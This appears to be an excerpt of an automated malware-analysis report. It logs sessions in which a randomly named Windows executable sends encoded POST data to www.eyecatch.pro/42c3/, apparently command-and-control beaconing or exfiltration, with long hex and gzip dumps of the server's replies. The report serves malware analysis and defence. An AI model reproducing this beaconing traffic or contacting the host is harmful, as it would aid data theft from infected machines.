                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 38 4c 48 67 44 4a 70 3d 67 65 69 61 4e 63 2f 49 48 76 56 72 31 58 74 50 49 65 61 4e 50 33 57 46 37 58 68 56 72 61 48 70 70 71 6f 76 42 59 55 79 7a 6c 35 65 63 56 35 2b 62 39 41 70 63 6d 72 79 55 44 42 35 7a 66 48 47 78 48 77 54 69 35 6c 66 4f 4c 4f 72 53 69 31 45 50 71 43 62 66 30 7a 33 58 64 78 64 30 54 63 4f 30 4e 67 39 44 7a 62 4e 2f 77 78 41 4b 38 43 6a 47 5a 50 76 4a 70 34 64 64 6c 71 36 52 36 4a 54 76 67 3d 3d 26 61 46 3d 4a 4c 70 34 6f 30 51 78 32 46 2d 70 34 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        41192.168.2.550022217.160.0.220803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:14.351756096 CET743OUTPOST /42c3/ HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.eyecatch.pro
                                                                        Referer: http://www.eyecatch.pro/42c3/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 45 44 72 39 63 30 72 67 7a 5a 59 73 42 63 4a 70 79 68 4a 4b 66 43 70 57 32 65 52 64 6b 4b 61 73 32 31 35 75 71 68 78 2f 4d 58 4c 67 55 38 47 42 4c 2f 5a 67 43 52 39 4e 6a 58 61 33 2f 6a 2f 45 74 6e 6d 49 2f 45 6f 63 7a 47 69 6d 5a 38 38 61 47 64 6f 56 74 71 4b 6c 2b 30 51 36 34 46 4e 6d 32 61 52 39 61 43 34 35 4e 76 67 63 4c 71 63 43 59 63 6c 63 57 30 59 37 6a 5a 33 6f 71 4b 6f 74 66 58 46 4d 68 4e 46 67 31 71 2f 41 65 45 67 4a 31 4c 71 36 34 35 37 44 74 58 41 4d 48 2f 2b 78 39 67 66 46 78 62 57 41 77 77 5a 73 32 34 61 38 6f 32 78 2b 4e 56 78 2f 55 54 57 41 43 4e 37 41 47 70 4b 49 42 70 77 3d
                                                                        Data Ascii: J8LHgDJp=EDr9c0rgzZYsBcJpyhJKfCpW2eRdkKas215uqhx/MXLgU8GBL/ZgCR9NjXa3/j/EtnmI/EoczGimZ88aGdoVtqKl+0Q64FNm2aR9aC45NvgcLqcCYclcW0Y7jZ3oqKotfXFMhNFg1q/AeEgJ1Lq6457DtXAMH/+x9gfFxbWAwwZs24a8o2x+NVx/UTWACN7AGpKIBpw=
                                                                        Nov 9, 2024 05:38:15.270565987 CET1236INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:15 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 32 36 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 db 46 b2 ef df d6 a7 80 e9 5a 9b 4c 08 10 00 df 94 a8 9c 8d e2 9c cd bd f1 71 2a 4e ea d4 dd f5 96 0b 24 41 11 36 49 70 01 50 8f d5 ea bb df 5f f7 cc 00 03 10 7c 88 b4 53 e7 e1 c4 92 48 a0 a7 bb a7 a7 a7 1f f3 bc 78 fe c3 db ab df fe df 2f af 8d 59 b2 98 5f 9e 5d d0 1f 63 ee 2d af 87 15 7f 69 fe fb f7 15 63 3c f7 e2 78 58 59 86 e6 c7 b8 42 10 be 37 b9 3c 7b 76 b1 f0 13 cf 18 cf bc 28 f6 93 61 e5 f7 df 7e 34 7b 15 a3 91 be 59 7a 0b 7f 58 b9 09 fc db 55 18 25 40 13 2e 13 7f 09 c8 db 60 92 cc 86 13 ff 26 18 fb 26 7f a9 1b c1 32 48 02 6f 6e c6 63 6f ee 0f 1d 89 27 1e 47 c1 2a b9 ac 4e d7 cb 71 12 84 cb 2a 31 57 7b a0 df 16 73 f5 1f a0 61 0c 99 f5 ec 81 15 f9 ab b9 37 f6 ab 8d f7 23 66 fa fd a8 51 7f f5 31 7e 55 7b ac 55 27 e1 78 bd 00 1b 96 fa f0 7a ee d3 f7 da f9 45 43 92 3b bb 48 82 64 ee 5f fe e2 5d fb c6 32 4c 8c 69 b8 5e 4e 8c 97 2f 7a ae e3 9c 1b af ef fd 2b 2f 19 cf 8c 5f a2 f0 a2 21 40 cf 84 30 b8 ca af a2 70 14 26 f1 ab b4 c2 af 96 61 [TRUNCATED]
                                                                        Data Ascii: 26ba}{sFZLq*N$A6IpP_|SHx/Y_]c-ic<xXYB7<{v(a~4{YzXU%@.`&&2Honco'G*Nq*1W{sa7#fQ1~U{U'xzEC;Hd_]2Li^N/z+/_!@0p&awu yxt1+<#_Ajj5w9^WNxyX?+$YFb<VQ2&{.Hx~c1}?$12bh^ZooF-oNFzKPZ-%>26}-!*Pp]7nWfb#~wGYo 67['y/$'7i/a=1$w!^kI<I'oToNc($ w'aIVV{d#r)U45}_qRvv%},j=XMnr=X&MQW}<Rwz4DyZ2OM<u4g=
                                                                        Nov 9, 2024 05:38:15.270581961 CET212INData Raw: 70 38 8c fe 96 fc fd b1 96 09 78 ad 04 1c df 06 e8 f7 68 88 87 31 34 aa 32 9d 7b d7 95 81 2c b8 04 50 e5 fd 7a d2 6b 8e f1 7b 3a 6d be 5f 4f 7d 7b fa 7e ed da f6 04 bf 3b 5e 57 3c 81 6e 6f 01 1b e5 c0 6a df 3d 77 06 cf f3 68 27 53 2f 2d 3b 99 36
                                                                        Data Ascii: p8xh142{,Pzk{:m_O}{~;^W<noj=wh'S/-;6uTD@/( F-~vm}S<5' QxB' Wx' ];&VAVSH|2v;\?rF[I^%'kju_O%!ypjg}
                                                                        Nov 9, 2024 05:38:15.270601034 CET1236INData Raw: 23 6f fe 6e 1c ae fc 97 2f 63 7f 3e 85 d7 45 7f 5f 8e 4b 41 be 23 7d 7e 3b 9d c2 4a fb fe f2 8a 3b 68 b5 69 db 75 a7 6d d7 06 81 85 c7 30 10 d2 7b 56 2b a2 07 57 6a 75 6f 18 51 37 bc 22 6f 8f 0e 5b 71 27 95 fa c3 2d fa ef af 08 1b 7e 8c fc 7f ac
                                                                        Data Ascii: #on/c>E_KA#}~;J;hium0{V+WjuoQ7"o[q'-~0cEpCOpU{mMwug9BtDiQ\27Wah@&pEhaKY0c="!j(gZf+x7#8>pOf
                                                                        Nov 9, 2024 05:38:15.270612001 CET1236INData Raw: 51 84 ce 70 45 bd e6 5c 68 af 2a ef 58 dd 76 4e 87 53 42 c6 38 48 fc 7a c6 60 f6 62 0a 81 fa 51 d9 ab 0f 1f 50 88 c7 d8 64 cb e6 28 67 5d d5 ea 39 2e c8 ca ce 4b b6 6b b0 0c a3 85 37 17 fd 37 89 bc 65 8c f8 62 31 40 90 e3 47 94 ee 69 bd 2c 27 86
                                                                        Data Ascii: QpE\h*XvNSB8Hz`bQPd(g]9.Kk77eb1@Gi,'?M!b;'MuAQ+*J[D}"C7[3/63ceF4.#mjT~N(K*Y'$VeQdFprJ}NQ#c>?`A7~0Z;75MRv
                                                                        Nov 9, 2024 05:38:15.270622969 CET1236INData Raw: 04 8d 71 5c d4 47 d5 da 69 72 63 3b ee 5e 35 5a 04 93 25 f5 c1 dd 34 ea 90 aa 0b 15 97 f8 5b 30 38 0e 74 a9 bd b7 f5 38 82 42 78 29 bd e6 86 14 7b 36 d9 74 03 e3 ff d5 7c 8c 29 bd 7e ea 49 99 f6 41 70 dd e6 9f 76 20 cc 5c 54 cd 38 1c 72 77 6b 89
                                                                        Data Ascii: q\Girc;^5Z%4[08t8Bx){6t|)~IApv \T8rwkJXgbk/Wt1:V-VUCfusskFBX3;:Bc|/8H+r5h"[Q.PHw;H[:VM6w3z'Ff&x ZvbiuH,;|Cr
                                                                        Nov 9, 2024 05:38:15.270633936 CET636INData Raw: c6 24 b8 51 93 da e4 7d 36 38 a0 6e 9e 71 40 df 72 1c d0 83 dd c8 c4 32 1a 5e 2b a9 05 84 6a 5a 5b 1b d9 e2 bc b8 26 56 67 c9 55 37 5a 01 15 ff e7 52 2c 99 9f d4 ce b5 ac 40 6f 7b 55 48 7b 2d 52 10 95 f2 95 86 8e 1c 73 67 09 73 29 8c ec f7 7b a0
                                                                        Data Ascii: $Q}68nq@r2^+jZ[&VgU7ZR,@o{UH{-Rsgs){T,L^NO`vfb_J*QX1-0(uN^3r(wb,85NXYC6Hh/n,5*6Po,wGr*QcmBQ#hSa0CbSOdmj8m_3
                                                                        Nov 9, 2024 05:38:15.270684004 CET1236INData Raw: 5c a0 e1 93 7b 84 04 a5 1d c8 0f 8f 07 8e 40 7e 40 1c 70 04 d6 03 fd ff 11 98 85 99 7b 92 df 3f 82 4a c1 ed 8a bc b8 44 63 0a 70 d2 df 9f 4e f0 70 3f 7f 0c ad 63 fc fb 11 74 44 53 65 c9 73 89 fc f2 ce 18 cb 16 68 57 ff d3 ba 5e 1e 45 09 8d 82 0f
                                                                        Data Ascii: \{@~@p{?JDcpNp?ctDSeshW^E>HV*QAb>A~OG`?O0|CG~>}[0ZRe4-oMIg+cG{x0K()gCm5%<$_U^(XBysId7m
                                                                        Nov 9, 2024 05:38:15.270694017 CET212INData Raw: b0 93 02 ae 3e 8a 56 63 6b 35 5b 7d 17 c5 b8 e3 88 ae 30 e2 9b a7 c4 fd 52 f2 0a 9c 30 d2 2e 98 c2 e9 f4 93 5f 60 31 63 43 5c a0 c3 97 52 3d bb 48 fd 73 45 f9 e7 7c 8f e3 f7 b1 e2 99 9c 0d 05 02 b8 f1 ea 19 fd a7 1b 34 af 4e cf 70 24 39 16 a3 8a
                                                                        Data Ascii: >Vck5[}0R0._`1cC\R=HsE|4Np$9%NiXEppo[XTEM4ME)btM1+J:0gJc>M9Q!+
                                                                        Nov 9, 2024 05:38:15.270730019 CET1236INData Raw: 99 7a 49 7f f9 4e 16 6c 38 c5 e1 09 38 05 96 12 2e 43 ba 44 a1 4a b4 83 42 ef 64 7a 20 46 cf cb 8b 1a 54 95 8d 0e 6a 29 73 31 8d 10 ab 62 fb 3c 45 6e 4f 40 22 5a 5f 8b 04 9f 5c f6 49 0c 48 29 67 f3 77 6a 3d 8e 3c be 82 6e dc c2 a0 0f ae 38 90 ba
                                                                        Data Ascii: zINl88.CDJBdz FTj)s1b<EnO@"Z_\IH)gwj=<n8YB1.n3^Ee|>3TRDhcF$ "2dH014p%NEqMJp][SD=L@8e/VLL6)1qdiCn_~<c;
                                                                        Nov 9, 2024 05:38:15.270742893 CET1236INData Raw: 0b cc 64 44 0b 78 79 2d cc e4 8b 63 d1 7d 39 30 92 bf e9 35 19 3f 1e b2 de e6 0c 44 98 b7 e9 0a d8 73 8b eb 7e df 21 66 61 9f 40 0e 47 a3 49 45 85 4b 21 bb 71 c9 57 03 2f bc 7b 63 e4 63 f0 0c 73 34 13 61 52 0d 1c 3e 82 0b 72 a3 70 b2 1e fb 06 66
                                                                        Data Ascii: dDxy-c}905?Ds~!fa@GIEK!qW/{ccs4aR>rpfbq[#bRW=1|[*=Iwj#bxw8/<H|E71t+BC!auxv#N{NgN%wt" 8x
                                                                        Nov 9, 2024 05:38:15.275475979 CET589INData Raw: 75 d7 a0 7c 07 82 14 e1 f0 84 6b b7 32 7f c7 8e 1f 9e 9f 9c 63 ea f7 e1 4e 65 40 00 97 23 9f 4a 37 cc 2f 74 72 99 d7 e6 57 3c 3a 2b a6 4a 28 06 51 23 cb e2 9d 18 ed 11 b7 a7 b2 c3 a6 45 41 ab 59 58 70 da 02 40 b9 6d e9 e5 82 e5 34 14 3e 59 f7 83
                                                                        Data Ascii: u|k2cNe@#J7/trW<:+J(Q#EAYXp@m4>YuiZ,] =YDPsbC_q/xG\i9d_%PITNVa@JW2fR\Z0g?'Ka3?DpA6f*IFIfk$


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        42192.168.2.550023217.160.0.220803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:16.909898043 CET763OUTPOST /42c3/ HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.eyecatch.pro
                                                                        Referer: http://www.eyecatch.pro/42c3/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 45 44 72 39 63 30 72 67 7a 5a 59 73 44 35 5a 70 31 32 56 4b 5a 69 70 56 35 2b 52 64 39 36 61 6f 32 31 31 75 71 6c 67 6b 4d 6c 66 67 61 38 32 42 49 2b 5a 67 44 52 39 4e 37 48 61 2b 78 44 2f 66 74 6e 36 41 2f 47 38 63 7a 47 65 6d 5a 34 34 61 47 4f 41 57 2f 71 4b 6e 32 55 51 34 31 6c 4e 6d 32 61 52 39 61 43 45 54 4e 73 51 63 4c 62 4d 43 61 35 4a 62 65 55 59 36 67 5a 33 6f 39 61 70 6b 66 58 45 66 68 4d 4a 61 31 73 37 41 65 46 51 4a 30 61 71 37 74 4a 37 4e 79 6e 42 39 47 38 76 76 34 32 4c 30 7a 63 7a 47 67 44 42 4e 2b 75 72 57 79 55 35 57 65 31 64 48 45 41 65 33 54 39 61 70 63 4b 61 34 66 2b 6e 6f 45 2b 52 56 71 54 47 70 4c 42 64 32 4e 72 64 74 74 69 41 54
                                                                        Data Ascii: J8LHgDJp=EDr9c0rgzZYsD5Zp12VKZipV5+Rd96ao211uqlgkMlfga82BI+ZgDR9N7Ha+xD/ftn6A/G8czGemZ44aGOAW/qKn2UQ41lNm2aR9aCETNsQcLbMCa5JbeUY6gZ3o9apkfXEfhMJa1s7AeFQJ0aq7tJ7NynB9G8vv42L0zczGgDBN+urWyU5We1dHEAe3T9apcKa4f+noE+RVqTGpLBd2NrdttiAT
                                                                        Nov 9, 2024 05:38:17.845988035 CET1236INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:17 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 32 36 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 db 46 b2 ef df d6 a7 80 e9 5a 9b 4c 08 10 00 df 94 a8 9c 8d e2 9c cd bd f1 71 2a 4e ea d4 dd f5 96 0b 24 41 11 36 49 70 01 50 8f d5 ea bb df 5f f7 cc 00 03 10 7c 88 b4 53 e7 e1 c4 92 48 a0 a7 bb a7 a7 a7 1f f3 bc 78 fe c3 db ab df fe df 2f af 8d 59 b2 98 5f 9e 5d d0 1f 63 ee 2d af 87 15 7f 69 fe fb f7 15 63 3c f7 e2 78 58 59 86 e6 c7 b8 42 10 be 37 b9 3c 7b 76 b1 f0 13 cf 18 cf bc 28 f6 93 61 e5 f7 df 7e 34 7b 15 a3 91 be 59 7a 0b 7f 58 b9 09 fc db 55 18 25 40 13 2e 13 7f 09 c8 db 60 92 cc 86 13 ff 26 18 fb 26 7f a9 1b c1 32 48 02 6f 6e c6 63 6f ee 0f 1d 89 27 1e 47 c1 2a b9 ac 4e d7 cb 71 12 84 cb 2a 31 57 7b a0 df 16 73 f5 1f a0 61 0c 99 f5 ec 81 15 f9 ab b9 37 f6 ab 8d f7 23 66 fa fd a8 51 7f f5 31 7e 55 7b ac 55 27 e1 78 bd 00 1b 96 fa f0 7a ee d3 f7 da f9 45 43 92 3b bb 48 82 64 ee 5f fe e2 5d fb c6 32 4c 8c 69 b8 5e 4e 8c 97 2f 7a ae e3 9c 1b af ef fd 2b 2f 19 cf 8c 5f a2 f0 a2 21 40 cf 84 30 b8 ca af a2 70 14 26 f1 ab b4 c2 af 96 61 [TRUNCATED]
                                                                        Data Ascii: 26ba}{sFZLq*N$A6IpP_|SHx/Y_]c-ic<xXYB7<{v(a~4{YzXU%@.`&&2Honco'G*Nq*1W{sa7#fQ1~U{U'xzEC;Hd_]2Li^N/z+/_!@0p&awu yxt1+<#_Ajj5w9^WNxyX?+$YFb<VQ2&{.Hx~c1}?$12bh^ZooF-oNFzKPZ-%>26}-!*Pp]7nWfb#~wGYo 67['y/$'7i/a=1$w!^kI<I'oToNc($ w'aIVV{d#r)U45}_qRvv%},j=XMnr=X&MQW}<Rwz4DyZ2OM<u4g=
                                                                        Nov 9, 2024 05:38:17.846003056 CET1236INData Raw: 70 38 8c fe 96 fc fd b1 96 09 78 ad 04 1c df 06 e8 f7 68 88 87 31 34 aa 32 9d 7b d7 95 81 2c b8 04 50 e5 fd 7a d2 6b 8e f1 7b 3a 6d be 5f 4f 7d 7b fa 7e ed da f6 04 bf 3b 5e 57 3c 81 6e 6f 01 1b e5 c0 6a df 3d 77 06 cf f3 68 27 53 2f 2d 3b 99 36
                                                                        Data Ascii: p8xh142{,Pzk{:m_O}{~;^W<noj=wh'S/-;6uTD@/( F-~vm}S<5' QxB' Wx' ];&VAVSH|2v;\?rF[I^%'kju_O%!ypjg}#on/c>E_KA#}~;J
                                                                        Nov 9, 2024 05:38:17.846014023 CET1236INData Raw: c1 8b 76 bb 7d 4e 51 8d 19 07 ff f4 07 4e 73 75 77 4e f6 55 0a 79 0c 7f ed 47 8f 56 10 9b 13 2f fa 24 48 19 87 63 9f f2 7f 5e e7 b1 50 e4 41 b6 35 9a 9a 34 44 7b 3d 0e 27 fe 83 54 3b 07 21 56 1c ce 83 89 f1 62 3c 1e 9f 8b a7 66 e4 4d 82 75 3c 68
                                                                        Data Ascii: v}NQNsuwNUyGV/$Hc^PA54D{='T;!Vb<fMu<hSf|Ao<#@//7O0rA4}8>%2"2k0SIe 1$(kJ@Y4Rl-+SJ~KiP3aQpE\h*XvNSB8Hz`b
                                                                        Nov 9, 2024 05:38:17.846029997 CET636INData Raw: 89 e6 ad 17 2d 4c 76 7b d1 7a b1 b3 d5 bb 2d d0 c3 8f 9b 35 ba d3 76 ea 0e 14 c1 b5 fb 35 c3 d5 25 40 0d 03 11 b4 d4 33 30 db 02 5f a4 1e 1d f5 8c 0a a3 a1 fa bd 9a d1 4b 9f 81 40 ab 57 ef ee 15 1f 5c 0e 3c 8e 90 9f 32 5d bb a4 05 ad 70 ed 0e 6a
                                                                        Data Ascii: -Lv{z-5v5%@30_K@W\<2]pjCJ+q\vmAhj-<i+qS-&qouRE'HQN@ul}w`}revBD/0w&2w1]3&q\Girc;^5Z%4[
                                                                        Nov 9, 2024 05:38:17.846043110 CET1236INData Raw: 8d 36 96 a5 27 be bf 82 f8 a1 05 e2 17 75 de 8d d2 ad 6d a5 31 1b 1a a1 b8 a2 5c 56 76 2b e5 70 9d 90 cf 42 86 ad 17 37 31 1d 27 e8 53 b0 6d 64 bf c8 0a 28 c0 7c ed 9c 6d dc 61 ad 44 bc 93 bb b4 e4 78 1d 63 5a c4 44 ba 88 fc 49 8c 18 a7 43 14 59
                                                                        Data Ascii: 6'um1\Vv+pB71'Smd(|maDxcZDICYR^Q/v.ba@^f(PJgD@^L14otv,5@Z)()=cy)Lw1k84.\'CNC
                                                                        Nov 9, 2024 05:38:17.846054077 CET1236INData Raw: 97 03 91 65 05 4a b0 15 bd d5 5e 85 cb 0a 94 60 13 dd 32 03 39 90 c3 62 b1 12 cc c2 cf 6c 60 2e 3e d8 e1 f5 0f f6 3e 45 9c 25 1e 3d 1b 59 2b 84 16 aa fb aa 45 20 25 35 11 3e e9 14 22 fb 3d d5 29 d8 0f f3 5f a7 50 10 36 0b 5e b0 44 3a a5 9e 49 5b
                                                                        Data Ascii: eJ^`29bl`.>>E%=Y+E %5>"=)_P6^D:I[%5H~GbOY"B$wZR;IEd%$jyT%$b\[IzJR{)$?7B`})8B#+[7.XDVBOXpx\{@~@p{
                                                                        Nov 9, 2024 05:38:17.846065044 CET424INData Raw: e7 0f 1e c4 66 a1 aa a4 82 87 aa fd 56 82 b2 81 c9 8e 0a ce a4 d6 ca 11 5b 19 0b 1e d2 29 4f e1 6e 17 51 bd 13 52 97 b3 96 de cd 08 67 e9 e0 8f b1 69 2e 0e eb 53 b4 89 b3 ac 47 1f 2c ce 32 1e 8a 8c 96 59 a4 6c b9 7d 07 21 28 f6 ac e5 aa 33 0f 9e
                                                                        Data Ascii: fV[)OnQRgi.SG,2Yl}!(3\#[|psX7ouD~KZgHW"/T>0iZUT$9A*4v^+c..4z=:I:_>Vck5[}0R0.
                                                                        Nov 9, 2024 05:38:17.846152067 CET1236INData Raw: 99 7a 49 7f f9 4e 16 6c 38 c5 e1 09 38 05 96 12 2e 43 ba 44 a1 4a b4 83 42 ef 64 7a 20 46 cf cb 8b 1a 54 95 8d 0e 6a 29 73 31 8d 10 ab 62 fb 3c 45 6e 4f 40 22 5a 5f 8b 04 9f 5c f6 49 0c 48 29 67 f3 77 6a 3d 8e 3c be 82 6e dc c2 a0 0f ae 38 90 ba
                                                                        Data Ascii: zINl88.CDJBdz FTj)s1b<EnO@"Z_\IH)gwj=<n8YB1.n3^Ee|>3TRDhcF$ "2dH014p%NEqMJp][SD=L@8e/VLL6)1qdiCn_~<c;
                                                                        Nov 9, 2024 05:38:17.846163034 CET1236INData Raw: 0b cc 64 44 0b 78 79 2d cc e4 8b 63 d1 7d 39 30 92 bf e9 35 19 3f 1e b2 de e6 0c 44 98 b7 e9 0a d8 73 8b eb 7e df 21 66 61 9f 40 0e 47 a3 49 45 85 4b 21 bb 71 c9 57 03 2f bc 7b 63 e4 63 f0 0c 73 34 13 61 52 0d 1c 3e 82 0b 72 a3 70 b2 1e fb 06 66
                                                                        Data Ascii: dDxy-c}905?Ds~!fa@GIEK!qW/{ccs4aR>rpfbq[#bRW=1|[*=Iwj#bxw8/<H|E71t+BC!auxv#N{NgN%wt" 8x
                                                                        Nov 9, 2024 05:38:17.846173048 CET589INData Raw: 75 d7 a0 7c 07 82 14 e1 f0 84 6b b7 32 7f c7 8e 1f 9e 9f 9c 63 ea f7 e1 4e 65 40 00 97 23 9f 4a 37 cc 2f 74 72 99 d7 e6 57 3c 3a 2b a6 4a 28 06 51 23 cb e2 9d 18 ed 11 b7 a7 b2 c3 a6 45 41 ab 59 58 70 da 02 40 b9 6d e9 e5 82 e5 34 14 3e 59 f7 83
                                                                        Data Ascii: u|k2cNe@#J7/trW<:+J(Q#EAYXp@m4>YuiZ,] =YDPsbC_q/xG\i9d_%PITNVa@JW2fR\Z0g?'Ka3?DpA6f*IFIfk$


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        43192.168.2.550024217.160.0.220803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:19.461240053 CET1780OUTPOST /42c3/ HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.eyecatch.pro
                                                                        Referer: http://www.eyecatch.pro/42c3/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 45 44 72 39 63 30 72 67 7a 5a 59 73 44 35 5a 70 31 32 56 4b 5a 69 70 56 35 2b 52 64 39 36 61 6f 32 31 31 75 71 6c 67 6b 4d 6c 6e 67 61 50 4f 42 4f 74 78 67 52 42 39 4e 6c 58 61 37 78 44 2b 4e 74 6e 69 45 2f 47 41 4d 7a 44 61 6d 59 62 77 61 58 76 41 57 31 71 4b 6e 36 30 51 35 34 46 4e 33 32 61 42 44 61 44 6f 54 4e 73 51 63 4c 5a 6b 43 65 73 6c 62 59 55 59 37 6a 5a 32 70 71 4b 70 4d 66 58 63 50 68 4d 64 4b 31 63 62 41 65 6c 41 4a 32 73 57 37 78 5a 37 50 78 6e 42 6c 47 38 6a 4f 34 79 71 4e 7a 5a 6e 67 67 44 35 4e 74 62 4f 64 6f 46 4a 71 41 46 6c 69 47 7a 61 54 4e 59 62 49 63 49 6d 4f 62 4e 58 67 46 71 4a 6f 6f 6c 7a 71 4f 77 68 7a 61 50 42 2b 6a 31 42 59 73 6b 58 4b 66 2f 56 69 50 6b 46 75 6d 59 37 38 75 57 53 77 74 73 69 36 49 55 38 39 73 34 6b 42 46 6c 6a 41 6e 43 2f 78 31 51 48 37 2b 75 6a 75 74 7a 65 33 61 6a 55 65 5a 68 44 5a 76 38 58 73 50 47 55 38 32 49 4c 78 54 75 77 44 6a 5a 63 31 70 77 63 43 30 69 5a 46 43 58 47 2b 64 53 74 2f 31 2b 6e 30 49 4f 76 4b 2f 46 6b 42 4e [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=EDr9c0rgzZYsD5Zp12VKZipV5+Rd96ao211uqlgkMlngaPOBOtxgRB9NlXa7xD+NtniE/GAMzDamYbwaXvAW1qKn60Q54FN32aBDaDoTNsQcLZkCeslbYUY7jZ2pqKpMfXcPhMdK1cbAelAJ2sW7xZ7PxnBlG8jO4yqNzZnggD5NtbOdoFJqAFliGzaTNYbIcImObNXgFqJoolzqOwhzaPB+j1BYskXKf/ViPkFumY78uWSwtsi6IU89s4kBFljAnC/x1QH7+ujutze3ajUeZhDZv8XsPGU82ILxTuwDjZc1pwcC0iZFCXG+dSt/1+n0IOvK/FkBNEcHI9bxdZjrRkt+e4VEMl73jZL+RYPje6X8D0bZ2jhGxEqvutVDABhdj7MSExBZhdaiH4hEG7cOrdabftPRobzLaydt7hp+81ygwRumTZnNWWwa+9Rsa46aIp7/0mKrSYERKCwYys5yddK3fA+zoAMXu9J3a8fpNEoanFW6/nPy7VyqdfHEEUVBft01O8XlFK4rrUsAx9pB/lwkf6daDE/KtH8qZ3XRhiQEJ2Vovoa7aX/NU9fxSsKaTKcVa2MiGUQH1PgMTDtCol018F8SEeie8Q6agV7bCOzrGJY/lcSqIACfAL7YVSXc60JASDyENXtOP7VLkhkK/JmygbTC/rj3XJyYaiYfxJpNPlkuKLgdbUr+hoHs8u9v5WiTpSEhxVNlQQbYQObWohK3Tzkf/v0v1HwYqzEGDOaERy+S8afqwf0zlgcDaLJ+QW1f82V6p4AM1oH4GkKgksKzYsQL4xQ6H+LkSfEGxNUD7rZrlITp+//jzsGkHefmYR1nLszuzfgKlClqDKQr2N8z72mJLbP6vMLBBzpmgl/T30MJ8hAXnHezDDUnpII7EEeBvXf4x3QjlZWsLMQ56uRdrCU7ywm2KWHktjb5clLv98LspLMN4VjQ3/SoHxTHjj9bHWVz72jqi5O/ggf3BYrOybONkebdtJAXdOfB7Mh [TRUNCATED]
